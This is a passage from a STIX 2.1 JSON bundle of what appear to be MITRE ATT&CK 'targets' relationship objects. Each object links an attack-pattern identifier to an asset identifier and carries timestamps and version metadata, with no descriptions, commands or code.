"2024-07-01T10:37:15.835229", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be39cab4-3d0d-4b4b-8e05-90278aa0bee3", "created": "2024-07-01T10:37:15.835237", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835239", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--967846cb-dbfa-4397-99f2-cbe1d16082f4", "created": "2024-07-01T10:37:15.835247", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835249", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1ca64f7-5d9a-40c3-88ff-aedef03f9f11", "created": "2024-07-01T10:37:15.835257", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835259", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cca7db3e-8fe1-4412-8c69-2667aab7e959", "created": "2024-07-01T10:37:15.835266", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835268", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09472efc-d462-4a1a-be88-b6cf4c2ad935", "created": "2024-07-01T10:37:15.835276", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835278", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8cd8939f-e890-4174-8e82-cdf9603a897a", "created": "2024-07-01T10:37:15.835286", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835288", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--64d496a7-9831-4600-a79c-c61254ae5c77", "created": "2024-07-01T10:37:15.835295", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835297", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6948e07b-1104-4f5b-9475-36785fa17b93", "created": "2024-07-01T10:37:15.835305", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835307", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80a68a29-43cd-4f7a-8e56-cd641a870615", "created": "2024-07-01T10:37:15.835315", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835317", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--acbe6161-9045-40f7-9a4e-5fd08d14dd6f", "created": "2024-07-01T10:37:15.835324", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835327", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbd5d0b1-2bc8-40c5-a75b-b483aef9f191", "created": "2024-07-01T10:37:15.835334", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835336", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--663923f4-5b96-49a2-a06e-ce29e15909dc", "created": "2024-07-01T10:37:15.835344", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835346", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c64ac93-180b-488e-8914-833d577e9d3e", "created": "2024-07-01T10:37:15.835354", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835356", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24da4216-b847-4892-a0af-106304305b0a", "created": "2024-07-01T10:37:15.835363", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835365", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7457f04b-e90c-44e7-bb5e-ff31890e47ee", "created": "2024-07-01T10:37:15.835373", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835375", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6e2b4d0-c368-4f7b-91eb-1e69cc296747", "created": "2024-07-01T10:37:15.835383", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835385", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--05c95f14-b89a-4731-9a54-3a5cb947c7a7", "created": "2024-07-01T10:37:15.835392", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835395", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb0eabea-bd6a-40e5-81ba-b486d6cb7a18", "created": "2024-07-01T10:37:15.835402", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835404", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c62ef78f-10aa-4261-95ab-9f301796d82d", "created": "2024-07-01T10:37:15.835412", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835414", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--289d81cc-baa8-4468-8290-1e119ed7a28e", "created": "2024-07-01T10:37:15.835422", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835424", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c6fb776-c509-4f90-a08f-73ab1dd67435", "created": "2024-07-01T10:37:15.835431", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835434", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--85bbfa13-5235-47dd-99e8-fb5d0065da3b", "created": "2024-07-01T10:37:15.835441", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835443", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f89370f-4e63-49ca-97fb-6d6458c50ad2", "created": "2024-07-01T10:37:15.835451", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835453", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--126895f0-08ed-4a74-86fd-949adcc8fa87", "created": "2024-07-01T10:37:15.835461", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835463", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--922d849c-28a3-47b9-8251-bd04b864a656", "created": "2024-07-01T10:37:15.835471", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835473", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aef39278-1059-46db-974e-de6bb2aec914", "created": "2024-07-01T10:37:15.835481", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835483", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf954929-e817-41b1-a6ed-f3e8adfe2e9a", "created": "2024-07-01T10:37:15.835490", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835492", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96db3999-d1b4-432f-a155-c76852ed2a5b", "created": "2024-07-01T10:37:15.835500", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835502", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d07bda1-d7dc-4b25-833f-200bae20e5ec", "created": "2024-07-01T10:37:15.835510", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835512", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fb4c472b-26fc-46a1-8237-e422eecdcfd0", "created": "2024-07-01T10:37:15.835520", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835522", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2dd9c2fc-be4a-4680-bd54-4113c362c55a", "created": "2024-07-01T10:37:15.835529", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835531", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fdd062f5-1c11-4034-addb-4ae56c19ca4c", "created": "2024-07-01T10:37:15.835539", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835541", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6919d0fc-4513-42b0-b0a4-11c1a67cc684", "created": "2024-07-01T10:37:15.835549", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835551", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b025033d-0a7f-4a6b-a9d9-608bf09fee2d", "created": "2024-07-01T10:37:15.835558", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835560", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a28a925e-f61c-405d-ae0c-a5cf5b684c14", "created": "2024-07-01T10:37:15.835568", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835570", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39d8ff8e-23d6-49a0-b36f-4b4fd40a39fa", "created": "2024-07-01T10:37:15.835578", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835580", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23c44838-9ade-409f-9620-d18b51202d84", "created": "2024-07-01T10:37:15.835587", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835589", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dfa82da9-70f7-4194-8cf2-61550e21e09b", "created": "2024-07-01T10:37:15.835597", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835599", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--67105941-3421-4feb-ad54-057627e0e5c3", "created": "2024-07-01T10:37:15.835607", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835609", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8222628d-95e1-46de-86e2-6771ec4d104c", "created": "2024-07-01T10:37:15.835617", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835619", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f8ce277-1517-46c8-9fda-b4ab2042375b", "created": "2024-07-01T10:37:15.835626", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835629", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", 